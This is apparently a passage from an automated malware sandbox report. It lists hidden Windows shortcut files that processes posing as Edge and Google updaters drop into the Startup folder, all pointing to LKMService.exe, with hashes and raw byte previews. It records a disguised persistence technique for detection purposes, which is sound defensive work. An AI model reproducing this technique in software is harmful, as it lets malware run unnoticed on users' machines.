                                                                                                                                                                                                                                          SHA-512:099E61A85A7FBE547A418CE03B7ED551076F19E29545AEF78CE3ACBF8731F326BA53B99CB9017E655CFAD191B4A001DCCBE2603970FCF1010E86230EC7D82D17
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                          Preview:L..................F...."...${......OXG..............V......................&.:..DG..Yr?.D..U..k0.&...&.......$..S...M..................t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2BYTe...........................^.A.p.p.D.a.t.a...B.P.1.....BYRe..Local.<......EW<2BYTe....[.........................L.o.c.a.l.....N.1.....BY.e..Temp..:......EW<2BY.e....^.........................T.e.m.p.....`.1.....BY]e..EDGEUP~1..H......BYVeBY]e...........................Y/.E.d.g.e.U.p.d.a.t.e.r.....j.2..V..BYUe".LKMSER~1.EXE..N......BYVeBYVe..........................L5..L.K.M.S.e.r.v.i.c.e...e.x.e.......n...............-.......m............#.B.....C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe..7.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.E.d.g.e.U.p.d.a.t.e.r.\.L.K.M.S.e.r.v.i.c.e...e.x.e.........|....I.J.H..K..:...`.......X.......715575...........hT..CrF.f4... .....Jc...-...-$..hT..CrF.f4... .....Jc...-...-$.............1SPS.XF.L8C..

                                                                                                                                                                                                                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_57a7b6ccf06242a284e202f36ebfdd49.lnk

                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exe
                                                                                                                                                                                                                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Hidden, Archive, ctime=Wed Oct 2 11:42:42 2024, mtime=Wed Oct 2 11:43:29 2024, atime=Wed Oct 2 11:42:40 2024, length=153088, window=hide
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):1188
                                                                                                                                                                                                                                          Entropy (8bit):4.962641081914835
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:24:8+xsDYlXPXv+R5gKHoj/jiSAzav/42eEFsuqygm:8+xsDYlf2RRo7sevgosryg
                                                                                                                                                                                                                                          MD5:1A223ADFB0C1BB6A44115DB0CC391781
                                                                                                                                                                                                                                          SHA1:02748A8C8B26BBF8EEEDD3153E39507B7E525D0C
                                                                                                                                                                                                                                          SHA-256:CD56C8E2612E3EC0B19024D9AFEBEF7AF6FC79B9A6DD39BE0AEBA809A1A76B81
                                                                                                                                                                                                                                          SHA-512:F1580005760E0D48496B98AE14EFBE4A3AA410E7775B587197672A24E60DC64613E340DC2C46B877E76BB7969D6D49BDEA50BB909CC8A78FDA3075A21CB25E8F
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                          Preview:L..................F...."...${.......B..............V......................&.:..DG..Yr?.D..U..k0.&...&.......$..S...M.......!.........t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2BYTe...........................^.A.p.p.D.a.t.a...B.P.1.....BYRe..Local.<......EW<2BYTe....[.........................L.o.c.a.l.....N.1.....BYoe..Temp..:......EW<2BYoe....^......................)<.T.e.m.p.....`.1.....BY]e..EDGEUP~1..H......BYVeBY]e...........................Y/.E.d.g.e.U.p.d.a.t.e.r.....j.2..V..BYUe".LKMSER~1.EXE..N......BYVeBYVe..........................L5..L.K.M.S.e.r.v.i.c.e...e.x.e.......n...............-.......m............#.B.....C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe..7.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.E.d.g.e.U.p.d.a.t.e.r.\.L.K.M.S.e.r.v.i.c.e...e.x.e.........|....I.J.H..K..:...`.......X.......715575...........hT..CrF.f4... .....Jc...-...-$..hT..CrF.f4... .....Jc...-...-$.............1SPS.XF.L8C..

                                                                                                                                                                                                                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_5a5761ee76794740b5270c0c2e3b1236.lnk

                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exe
                                                                                                                                                                                                                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Hidden, Archive, ctime=Wed Oct 2 11:42:42 2024, mtime=Wed Oct 2 11:44:01 2024, atime=Wed Oct 2 11:42:40 2024, length=153088, window=hide
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):1188
                                                                                                                                                                                                                                          Entropy (8bit):4.964538841136749
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:24:8osDYlXPXv+RPgKU8j/jiSAzav/42eEFsuqygm:8osDYlf2Rf7sevgosryg
                                                                                                                                                                                                                                          MD5:8C38D2CE6DF93D744D26CE23F17B908D
                                                                                                                                                                                                                                          SHA1:04F783B3E9EAD41431EE2A3441EECF9DC6F340EA
                                                                                                                                                                                                                                          SHA-256:C84FE315A6ADF65F1BAC79BEDC836AF2460B02AA2BB65340907760F92030B9A9
                                                                                                                                                                                                                                          SHA-512:B747D170DF5233E4261B15CED5764DC81B262AD8C77A54427E9341FDABE57289EA3B221DDCC2BCB5F3A3EC8A32F29305EAE7743C1491C956D9BE881D20909FA3
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                          Preview:L..................F...."...${.......................V......................&.:..DG..Yr?.D..U..k0.&...&.......$..S...M.......!.........t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2BYTe...........................^.A.p.p.D.a.t.a...B.P.1.....BYRe..Local.<......EW<2BYTe....[.........................L.o.c.a.l.....N.1.....BYqe..Temp..:......EW<2BYre....^.....................n...T.e.m.p.....`.1.....BY]e..EDGEUP~1..H......BYVeBY]e...........................Y/.E.d.g.e.U.p.d.a.t.e.r.....j.2..V..BYUe".LKMSER~1.EXE..N......BYVeBYVe..........................L5..L.K.M.S.e.r.v.i.c.e...e.x.e.......n...............-.......m............#.B.....C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe..7.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.E.d.g.e.U.p.d.a.t.e.r.\.L.K.M.S.e.r.v.i.c.e...e.x.e.........|....I.J.H..K..:...`.......X.......715575...........hT..CrF.f4... .....Jc...-...-$..hT..CrF.f4... .....Jc...-...-$.............1SPS.XF.L8C..

                                                                                                                                                                                                                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_61b2706f85d14fec9c863d1fe733f363.lnk

                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe
                                                                                                                                                                                                                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Hidden, Archive, ctime=Wed Oct 2 11:42:42 2024, mtime=Wed Oct 2 11:42:50 2024, atime=Wed Oct 2 11:42:40 2024, length=153088, window=hide
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):1188
                                                                                                                                                                                                                                          Entropy (8bit):4.939132419547437
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:24:857cDYlXPXv+RIgKef2jiSAzav/42eEFsuqygm:85oDYlf2Rb2sevgosryg
                                                                                                                                                                                                                                          MD5:AEC24E97F9F566C7058871BC87EDBD3D
                                                                                                                                                                                                                                          SHA1:C8F1EB59C9A2854058B9E18441F2CF9FEA957C89
                                                                                                                                                                                                                                          SHA-256:917CD4C2DA7FC969907495E1AE64647F842BF0207B90DAAEFC249AD266413B0D
                                                                                                                                                                                                                                          SHA-512:0BAC1E9711993322F202E899BCEDD165B27108F7141822D32980C26C7AA7573874DF8DCBE21C5AA7EE42F43486EB6261E019529442B7D5F378DB0255311C6B8C
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                          Preview:L..................F...."...${.......T...............V......................&.:..DG..Yr?.D..U..k0.&...&.......$..S...M......"#r.........t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2BYTe...........................^.A.p.p.D.a.t.a...B.P.1.....BYRe..Local.<......EW<2BYTe....[.........................L.o.c.a.l.....N.1.....BYVe..Temp..:......EW<2BYVe....^........................T.e.m.p.....`.1.....BYXe..EDGEUP~1..H......BYVeBYXe..........................w([.E.d.g.e.U.p.d.a.t.e.r.....j.2..V..BYUe".LKMSER~1.EXE..N......BYVeBYVe..........................L5..L.K.M.S.e.r.v.i.c.e...e.x.e.......n...............-.......m............#.B.....C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe..7.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.E.d.g.e.U.p.d.a.t.e.r.\.L.K.M.S.e.r.v.i.c.e...e.x.e.........|....I.J.H..K..:...`.......X.......715575...........hT..CrF.f4... .....Jc...-...-$..hT..CrF.f4... .....Jc...-...-$.............1SPS.XF.L8C..

                                                                                                                                                                                                                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_61b4ecc36b264b268216526fd7ddf283.lnk

                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exe
                                                                                                                                                                                                                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Hidden, Archive, ctime=Wed Oct 2 11:42:42 2024, mtime=Wed Oct 2 11:43:22 2024, atime=Wed Oct 2 11:42:40 2024, length=153088, window=hide
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):1188
                                                                                                                                                                                                                                          Entropy (8bit):4.956693533924993
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:24:87sDYlXPXv+RaPgKzj/jiSAzav/42eEFsuqygm:87sDYlf2RG7sevgosryg
                                                                                                                                                                                                                                          MD5:976F5058A4936824AAC61E65AEDCF5D3
                                                                                                                                                                                                                                          SHA1:FC4964E54697B24BE28A486903044C97016DA141
                                                                                                                                                                                                                                          SHA-256:6BB1354C2229A211DE0550D5371A544DB5914F7CA491F5183F34E85508315EB6
                                                                                                                                                                                                                                          SHA-512:07098BE98D8E16D4DDA0BE2F8F47DE7C7D3D07AC84B36D89F072B0ADB6BAD5E91307296C89DB52AB50338EF8DBC4EA35B566816DB95C95BBE9FA96673C937342
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                          Preview:L..................F...."...${........p..............V......................&.:..DG..Yr?.D..U..k0.&...&.......$..S...M.......!.........t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2BYTe...........................^.A.p.p.D.a.t.a...B.P.1.....BYRe..Local.<......EW<2BYTe....[.........................L.o.c.a.l.....N.1.....BYle..Temp..:......EW<2BYle....^.....................34..T.e.m.p.....`.1.....BY]e..EDGEUP~1..H......BYVeBY]e...........................Y/.E.d.g.e.U.p.d.a.t.e.r.....j.2..V..BYUe".LKMSER~1.EXE..N......BYVeBYVe..........................L5..L.K.M.S.e.r.v.i.c.e...e.x.e.......n...............-.......m............#.B.....C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe..7.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.E.d.g.e.U.p.d.a.t.e.r.\.L.K.M.S.e.r.v.i.c.e...e.x.e.........|....I.J.H..K..:...`.......X.......715575...........hT..CrF.f4... .....Jc...-...-$..hT..CrF.f4... .....Jc...-...-$.............1SPS.XF.L8C..

                                                                                                                                                                                                                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_657ff44e105c473b8853327459bcb359.lnk

                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe
                                                                                                                                                                                                                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Hidden, Archive, ctime=Wed Oct 2 11:42:42 2024, mtime=Wed Oct 2 11:43:15 2024, atime=Wed Oct 2 11:42:40 2024, length=153088, window=hide
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):1188
                                                                                                                                                                                                                                          Entropy (8bit):4.943497370124222
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:24:8Li7cDYlXPXv+R+gKjyj/jiSAzav/42eEFsuqygm:8LioDYlf2Rgy7sevgosryg
                                                                                                                                                                                                                                          MD5:FCA968E69EE1517BEDA6ABA23B982FC3
                                                                                                                                                                                                                                          SHA1:F89D399EA7654B077CE2E3BE8C033665EB57F730
                                                                                                                                                                                                                                          SHA-256:88825C332BA4A20A1D8A17733F044D673A925B1B82F39A85964B3AEAFD68697B
                                                                                                                                                                                                                                          SHA-512:7F14FB9EF3F8EB574A9AB2F67E6D8E576A91996AFE0C2909CFE8CC3008B3433B192771D554E0BC7B7F3E7917E8B79F52471A5D0E6D0E6653FA51204D6973F3BB
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                          Preview:L..................F...."...${......j.W..............V......................&.:..DG..Yr?.D..U..k0.&...&.......$..S...M......"#r.........t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2BYTe...........................^.A.p.p.D.a.t.a...B.P.1.....BYRe..Local.<......EW<2BYTe....[.........................L.o.c.a.l.....N.1.....BYhe..Temp..:......EW<2BYhe....^.......................].T.e.m.p.....`.1.....BY]e..EDGEUP~1..H......BYVeBY]e...........................Y/.E.d.g.e.U.p.d.a.t.e.r.....j.2..V..BYUe".LKMSER~1.EXE..N......BYVeBYVe..........................L5..L.K.M.S.e.r.v.i.c.e...e.x.e.......n...............-.......m............#.B.....C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe..7.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.E.d.g.e.U.p.d.a.t.e.r.\.L.K.M.S.e.r.v.i.c.e...e.x.e.........|....I.J.H..K..:...`.......X.......715575...........hT..CrF.f4... .....Jc...-...-$..hT..CrF.f4... .....Jc...-...-$.............1SPS.XF.L8C..

                                                                                                                                                                                                                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_666ad270d6a945c18b2ed969cdd2fdfd.lnk

                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exe
                                                                                                                                                                                                                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Hidden, Archive, ctime=Wed Oct 2 11:42:42 2024, mtime=Wed Oct 2 11:44:28 2024, atime=Wed Oct 2 11:42:40 2024, length=153088, window=hide
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):1188
                                                                                                                                                                                                                                          Entropy (8bit):4.967230689860785
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:24:8ysDYlXPXv+RZgKrj/jiSAzav/42eEFsuqygm:8ysDYlf2RB7sevgosryg
                                                                                                                                                                                                                                          MD5:F45F158784A88C10486FC5B749226D6A
                                                                                                                                                                                                                                          SHA1:1395F46792F92E1F3B4A5FEB1A086089B40F7891
                                                                                                                                                                                                                                          SHA-256:336015E296670BB205D88BE24675C0E7195358A501C0665114EB32018543F75C
                                                                                                                                                                                                                                          SHA-512:8D040B31F357AA0ABA2FF548D471CD48ABB31CB5B1839A9BA40C78DAEED35F62C403B2C25E86710B9365428BEA627AE83CF5BCE25792DE9E2825866187346DBB
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                          Preview:L..................F...."...${......S...............V......................&.:..DG..Yr?.D..U..k0.&...&.......$..S...M.......!.........t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2BYTe...........................^.A.p.p.D.a.t.a...B.P.1.....BYRe..Local.<......EW<2BYTe....[.........................L.o.c.a.l.....N.1.....BY.e..Temp..:......EW<2BY.e....^.........................T.e.m.p.....`.1.....BY]e..EDGEUP~1..H......BYVeBY]e...........................Y/.E.d.g.e.U.p.d.a.t.e.r.....j.2..V..BYUe".LKMSER~1.EXE..N......BYVeBYVe..........................L5..L.K.M.S.e.r.v.i.c.e...e.x.e.......n...............-.......m............#.B.....C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe..7.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.E.d.g.e.U.p.d.a.t.e.r.\.L.K.M.S.e.r.v.i.c.e...e.x.e.........|....I.J.H..K..:...`.......X.......715575...........hT..CrF.f4... .....Jc...-...-$..hT..CrF.f4... .....Jc...-...-$.............1SPS.XF.L8C..

                                                                                                                                                                                                                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_66b58aade5ea4867b44220c6fa235449.lnk

                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe
                                                                                                                                                                                                                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Hidden, Archive, ctime=Wed Oct 2 11:42:42 2024, mtime=Wed Oct 2 11:42:51 2024, atime=Wed Oct 2 11:42:40 2024, length=153088, window=hide
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):1188
                                                                                                                                                                                                                                          Entropy (8bit):4.9351774104866
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:24:8ei7cDYlXPXv+RIgKef2jiSAzav/42eEFsuqygm:8loDYlf2Rb2sevgosryg
                                                                                                                                                                                                                                          MD5:F3C04573E66BB7463C9AB607FA0E1C7E
                                                                                                                                                                                                                                          SHA1:6ADF6B702AA5A19FD6625DDE748EEF8FFE144A6A
                                                                                                                                                                                                                                          SHA-256:8E60B6B4AE9E4EB0C64B232A34B961F93D56B9FBD835E594F13B83AF4FF51924
                                                                                                                                                                                                                                          SHA-512:AE222E882EA0EC32A5A5E87D642BCAA2AA4F816CCEE19C9991E1BFBF7C460CAC55B185857BB588402C2D01BD15B273C5CB154B44BDA00199BD34E6875044E0A3
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                          Preview:L..................F...."...${......XM-..............V......................&.:..DG..Yr?.D..U..k0.&...&.......$..S...M......"#r.........t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2BYTe...........................^.A.p.p.D.a.t.a...B.P.1.....BYRe..Local.<......EW<2BYTe....[.........................L.o.c.a.l.....N.1.....BYVe..Temp..:......EW<2BYVe....^........................T.e.m.p.....`.1.....BYXe..EDGEUP~1..H......BYVeBYXe..........................w([.E.d.g.e.U.p.d.a.t.e.r.....j.2..V..BYUe".LKMSER~1.EXE..N......BYVeBYVe..........................L5..L.K.M.S.e.r.v.i.c.e...e.x.e.......n...............-.......m............#.B.....C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe..7.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.E.d.g.e.U.p.d.a.t.e.r.\.L.K.M.S.e.r.v.i.c.e...e.x.e.........|....I.J.H..K..:...`.......X.......715575...........hT..CrF.f4... .....Jc...-...-$..hT..CrF.f4... .....Jc...-...-$.............1SPS.XF.L8C..

                                                                                                                                                                                                                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_6816d158af9343beb893d1364e0fd2e4.lnk

                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exe
                                                                                                                                                                                                                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Hidden, Archive, ctime=Wed Oct 2 11:42:42 2024, mtime=Wed Oct 2 11:44:00 2024, atime=Wed Oct 2 11:42:40 2024, length=153088, window=hide
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):1188
                                                                                                                                                                                                                                          Entropy (8bit):4.957677285103049
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:24:8ojsDYlXPXv+RPgKU8j/jiSAzav/42eEFsuqygm:8ssDYlf2Rf7sevgosryg
                                                                                                                                                                                                                                          MD5:052712CCB34562B27BF00F49A87AA33C
                                                                                                                                                                                                                                          SHA1:1492711C1AC6B9747808A7CA295ED8FCA99A67C9
                                                                                                                                                                                                                                          SHA-256:609D812673AE36B3C68E31FCA353ACE34FDFB9AB16C00067752C2679F91C25AA
                                                                                                                                                                                                                                          SHA-512:73517D87783BC0E7216AE010B7E989CF88776A30A7A25EF823164BFE6D6C7A727B0C9245EA1CEA399B8AFDA3ABDA59F48A0910857E8A6445729A38F38392B758
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                          Preview:L..................F...."...${........Y..............V......................&.:..DG..Yr?.D..U..k0.&...&.......$..S...M.......!.........t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2BYTe...........................^.A.p.p.D.a.t.a...B.P.1.....BYRe..Local.<......EW<2BYTe....[.........................L.o.c.a.l.....N.1.....BYqe..Temp..:......EW<2BYre....^.....................n...T.e.m.p.....`.1.....BY]e..EDGEUP~1..H......BYVeBY]e...........................Y/.E.d.g.e.U.p.d.a.t.e.r.....j.2..V..BYUe".LKMSER~1.EXE..N......BYVeBYVe..........................L5..L.K.M.S.e.r.v.i.c.e...e.x.e.......n...............-.......m............#.B.....C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe..7.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.E.d.g.e.U.p.d.a.t.e.r.\.L.K.M.S.e.r.v.i.c.e...e.x.e.........|....I.J.H..K..:...`.......X.......715575...........hT..CrF.f4... .....Jc...-...-$..hT..CrF.f4... .....Jc...-...-$.............1SPS.XF.L8C..

                                                                                                                                                                                                                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_7744945ac9674795b20afd2cdad9a5d1.lnk

                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exe
                                                                                                                                                                                                                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Hidden, Archive, ctime=Wed Oct 2 11:42:42 2024, mtime=Wed Oct 2 11:44:17 2024, atime=Wed Oct 2 11:42:40 2024, length=153088, window=hide
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):1188
                                                                                                                                                                                                                                          Entropy (8bit):4.959826183227314
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:24:8NesDYlXPXv+R3gKEtS8j/jiSAzav/42eEFsuqygm:8NesDYlf2RSx7sevgosryg
                                                                                                                                                                                                                                          MD5:0FB94864987E23FBEB835D98E03AC393
                                                                                                                                                                                                                                          SHA1:E8E7BC0EF69FB8DD94389899B38CAAE6B9F03882
                                                                                                                                                                                                                                          SHA-256:2D78A656CE3DBFC8CD1655D21930E120A6D875E783E2040AD842BAC8A8BFD633
                                                                                                                                                                                                                                          SHA-512:78C2BE9C3AFA65DB65F51110AD30667339093EDC4FC0778EAEB3BC0CCD0C21E12C7522CDB593D684F6C444B6DC1E6D94335D03B81FD38819109649CF9DB4B716
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                          Preview:L..................F...."...${........\..............V......................&.:..DG..Yr?.D..U..k0.&...&.......$..S...M.......!.........t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2BYTe...........................^.A.p.p.D.a.t.a...B.P.1.....BYRe..Local.<......EW<2BYTe....[.........................L.o.c.a.l.....N.1.....BY.e..Temp..:......EW<2BY.e....^......................xJ.T.e.m.p.....`.1.....BY]e..EDGEUP~1..H......BYVeBY]e...........................Y/.E.d.g.e.U.p.d.a.t.e.r.....j.2..V..BYUe".LKMSER~1.EXE..N......BYVeBYVe..........................L5..L.K.M.S.e.r.v.i.c.e...e.x.e.......n...............-.......m............#.B.....C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe..7.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.E.d.g.e.U.p.d.a.t.e.r.\.L.K.M.S.e.r.v.i.c.e...e.x.e.........|....I.J.H..K..:...`.......X.......715575...........hT..CrF.f4... .....Jc...-...-$..hT..CrF.f4... .....Jc...-...-$.............1SPS.XF.L8C..

                                                                                                                                                                                                                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_7b11fe00f6784f4493b884c053aa480e.lnk

                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exe
                                                                                                                                                                                                                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Hidden, Archive, ctime=Wed Oct 2 11:42:42 2024, mtime=Wed Oct 2 11:44:33 2024, atime=Wed Oct 2 11:42:40 2024, length=153088, window=hide
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):1188
                                                                                                                                                                                                                                          Entropy (8bit):4.961881306748894
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:24:8ESDYlXPXv+RvgKWnj/jiSAzav/42eEFsuqygm:8ESDYlf2R2n7sevgosryg
                                                                                                                                                                                                                                          MD5:9B0F517E8FCEAFC9D6EF546D7ACB3700
                                                                                                                                                                                                                                          SHA1:F08287CDBFA2A64AEF4116B75B662C662001E96D
                                                                                                                                                                                                                                          SHA-256:92BA8C34D0C588183D6B4FC6B68934CBB89C86A298BCA1A41864DC99587BB337
                                                                                                                                                                                                                                          SHA-512:22B4F4EF2661F9BC9F16A2B26896ECC2BDC86F314C78F12F958E51C3419813BA11C2E5BFAB5CAEB1C5C8EF1E0EF9787ADB169D1E1C939010D022541C00D31260
                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                          Preview:L..................F...."...${.......................V......................&.:..DG..Yr?.D..U..k0.&...&.......$..S...M..................t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2BYTe...........................^.A.p.p.D.a.t.a...B.P.1.....BYRe..Local.<......EW<2BYTe....[.........................L.o.c.a.l.....N.1.....BY.e..Temp..:......EW<2BY.e....^......................([.T.e.m.p.....`.1.....BY]e..EDGEUP~1..H......BYVeBY]e...........................Y/.E.d.g.e.U.p.d.a.t.e.r.....j.2..V..BYUe".LKMSER~1.EXE..N......BYVeBYVe..........................L5..L.K.M.S.e.r.v.i.c.e...e.x.e.......n...............-.......m............#.B.....C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe..7.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.E.d.g.e.U.p.d.a.t.e.r.\.L.K.M.S.e.r.v.i.c.e...e.x.e.........|....I.J.H..K..:...`.......X.......715575...........hT..CrF.f4... .....Jc...-...-$..hT..CrF.f4... .....Jc...-...-$.............1SPS.XF.L8C..

                                                                                                                                                                                                                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_7bfcb7d5ed9443a089edfeee5f821613.lnk

                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exe
                                                                                                                                                                                                                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Hidden, Archive, ctime=Wed Oct 2 11:42:42 2024, mtime=Wed Oct 2 11:43:28 2024, atime=Wed Oct 2 11:42:40 2024, length=153088, window=hide
                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                          Size (bytes):1188
                                                                                                                                                                                                                                          Entropy (8bit):4.955083210091178
                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                          SSDEEP:24:8c0sDYlXPXv+R5gKHj/jiSAzav/42eEFsuqygm:8PsDYlf2RF7sevgosryg
                                                                                                                                                                                                                                          MD5:4C8BDEA2843B6F79CFF53216397D04A3
                                                                                                                                                                                                                                          SHA1:309585A9B643EF7A27803479C3339DC17979BBC5
                                                                                                                                                                                                                                          SHA-256:EF14396F219E5CC103C4F592319EA490788F876BBB998EF77D53DCFA119C9EB3
                                                                                                                                                                                                                                          SHA-512:6B69E6E47C7311E9E7EEA83EA1AA1FFB1ED6CD87C9CC7CE5C901C2C41505F661D38BDC38D57827989976CA05CA208522537B28DDE93375CAE39BC7797C7DE28F
